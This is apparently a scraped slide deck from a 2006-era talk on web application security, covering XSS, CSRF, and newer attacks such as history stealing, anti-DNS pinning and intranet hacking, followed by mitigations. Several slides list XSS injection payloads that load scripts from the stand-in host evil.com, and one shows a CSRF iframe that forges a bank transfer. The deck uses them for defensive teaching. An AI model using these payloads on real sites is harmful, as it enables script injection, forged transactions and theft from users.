The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
Report
Share
Report
Share
1 of 38
Download to read offline
More Related Content
Rich Web App Security - Keeping your application safe
1. Rich Web App Security
Keeping your application safe
Jeremiah Grossman Joe Walker
Founder and CTO DWR Developer
WhiteHat Security Getahead
1
2. 5 Stages of Web
Application Security Grief
Denial
Anger
Bargaining
Depression
Acceptance
2
3. Network security solutions don't
work for web application security
Telnet
FTP
POP
App Servers
http(s)
Web Servers
Database
3
6. Building Blocks: XSS
XSS = Cross Site Scripting
You are at risk of an XSS attack any time you
allow scripts from someone untrusted into
pages from your domain
6
7. Building Blocks: XSS
You let the user enter their name
Someone is going to enter their name like this:
Joe<script src="evil.com/danger.js">
Then, whoever looks at Joe’s name will execute
Joe’s script and become a slave of Joe
7
8. Making User Input Safe
You filter out ‘<script.*>’ and then you’re safe.
Right?
8
9. Making User Input Safe
Actually you also need to filter:
<a href='javascript:danger();'>
<body onload='danger();'>
<p style='background-image:
url("javascript:danger();")');
<img src='javascript:danger()'/>
9
10. Making User Input Safe
And don’t forget:
<body background="javascript:danger()">
<link rel="stylesheet"
href="javascript:danger()"/>
<style>@import evil.com/danger.js</style>
<input type='image'
src='javascript:danger()'/>
10
11. Making User Input Safe
And then there’s:
<iframe src='evil.com/danger.html'/>
<meta http-equiv="refresh"
content="0;url=javascript:danger()">
<base href="javascript:danger()">
<frameset>
<frame src="javascript:danger()">...
11
12. Making User Input Safe
But remember:
<table background="javascript:danger()">
<tr background="javascript:danger()">
<div style="width:expression(danger();)">
<object type="text/x-scriptlet"
data="evil.com/danger.js">
12
13. 5 Stages of Web
Application Security Grief
Denial
Anger
Bargaining
Depression
Acceptance
13
14. Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This:
<a href="a.html" link</a>
makes perfect sense to a browser.
14
15. Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This:
<a href="a.html">link
makes perfect sense to a browser.
15
16. Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This:
<a href="a.html >link</a>
makes perfect sense to a browser.
16
17. Making User Input Safe
It’s made 1000 times worse by browsers being
able to make sense of virtually anything.
This: (depending on some encoding tricks)
¼a href="a.html"¾link¼/a¾
makes perfect sense to a browser.
17
18. Making User Input Safe
And we haven’t got into:
• Flash (ActionScript ~= JavaScript)
• SVG (can embed JavaScript)
• .htc (packaged HTML in IE)
• XML Data Islands (IE only)
• HTML+TIME
You can use both <object> and <embed> for many
of these
18
19. 5 Stages of Web
Application Security Grief
Denial
Anger
Bargaining
Depression
Acceptance
19
20. Building Blocks: CSRF
CSRF = Cross Site Request Forgery
You are at risk of a CSRF attack whenever you
assume that a request containing an
authentication header (e.g. cookies) is
something the user intended
20
21. Building Blocks: CSRF
bank.com evil.com
.
Welcome Fred,
Thank-you for logging in
<iframe width=0 height=0
src="http://bank.com/transfer.cgi?amnt=all&dest=MrEvil"/>
21
22. Building Blocks: CSRF
JavaScript is not always required to exploit a
CSRF hole
Often all you need is:
<iframe src="dangerous_url">
or <img src="dangerous_url"/>
or <script src="dangerous_url">
You can’t use XHR because cross-domain rules
prevent the request from being sent
22
23. Attacks only get more
Effective
70 new new attack techniques in 2006
Many are small, but they combine in worrying
ways
Jeremiah’s Top 10:
http://jeremiahgrossman.blogspot.com/2006/12/
top-10-web-hacks-of-2006.html
The 6 most important ...
23
24. 6. Hacking RSS Readers
} ⇢
Aggregators generally Users get
RSS Feeds
change the domain the result
Hacking RSS and Atom Feed Implementations
http://www.cgisecurity.com/papers/HackingFeeds.pdf
24
25. 5. Web Worms
If your site that isn’t 100% safe against XSS and CSRF,
users can attack their ‘friends’ with scripts
XHR/Flash/Quicktime can be used as a vector
Web worms grow much faster than email worms
So far, infections have been mostly benign, like how
email worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
25
26. 4. Backdooring Media Files
Many media types are scriptable by design:
Some are ‘scriptable’ by buffer-overflow:
If you are allowing users to upload files, be
afraid.
JavaScript Malware embedded in everything
http://jeremiahgrossman.blogspot.com/2006/09/javascript-malware-embedded-in.html
26
27. 3. History Stealing - Part 1
I want to know if you visit dodgy.com
I create a page with a link
and use a script to read the CSS link color:
purple:guilty, blue:not guilty
A page can quickly check thousands
of sites
http://ha.ckers.org/weird/CSS-history-hack.html
27
28. 3. History Stealing - Part 2
Point a script tag at a protected HTML
resource, detect differing replies by differing
error messages
<script src="http://mail.google.com/mail">
http://ha.ckers.org/weird/javascript-website-login-checker.html
28
29. 2. Anti-DNS Pinning
The basic attack:
A browser visits evil.com. The DNS lookup gives the real web-
server address.
1 second later evil.com creates an iframe to the evil.com and
drops the HTTP request
The DNS pin is dropped, the browser needs to look up DNS
again.
This time it gets someone else’s address.
The browser reads from the other site, but thinks it is the same
domain.
29
30. 2. Anti-DNS Pinning
As it is the attack isn’t very useful because:
• The browser thinks the domain is evil.com, so
cookies for innocent.com are not sent, cookie
protected resources are safe (for now)
• But it’s great for Intranet hacking - no cookies
are needed to read from 192.168.0.1 or
127.0.0.1
30
31. 1. Intranet Hacking
History stealing to enumerate hosts inside the
firewall
Anti-DNS pinning to read HTML from inside
Many routers / firewalls / etc have default
passwords, which an attacker can exploit
Use CSRF to alter router / firewall settings
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
31
32. 5 Stages of Web
Application Security Grief
Denial
Anger
Bargaining
Depression
Acceptance
32
33. Fixing XSS
(when HTML is Illegal)
1. Filter inputs by white-listing input characters
Remember to filter header names and values
2. Filter outputs for the display environment
For HTML:
& & < < > >
' ' " "
Other environments have other special chars
33
34. Fixing XSS
(when HTML is Legal, and Well Formed)
1. Filter inputs as before
2. Swap characters for entities (as before)
3. Swap back whitelist of allowed tags. e.g.:
<strong> <strong>
4. Take extra care over attributes:
s/<a href="([^&]*)"/>/<a href="$1"/>
5. Don’t use regular expressions
34
35. Fixing XSS
(when HTML is Legal, and NOT Well Formed)
1. Find another way to do it / Swap jobs / Find
some other solution to the problem
2. Create a tag soup parser to create a DOM
tree from a badly formed HTML document
Remember to recursively check encodings
3. Create a tree walker that removes all non
approved elements and attributes
35
36. Fixing CSRF
Force users to log off
Checking referrer headers doesn’t make things
safe, but it does slow attackers down
Include authentication tokens in the body
OWASP servlet filter
Double-submit cookie pattern
Security Corner: Cross-Site Request Forgeries
http://shiflett.org/articles/cross-site-request-forgeries
36
37. 5 Stages of Web
Application Security Grief
Denial
Anger
Bargaining
Depression
Acceptance
37
38. Questions?
Joe Walker Jeremiah Grossman
http://getahead.org/blog/joe http://www.whitehatsec.com/
38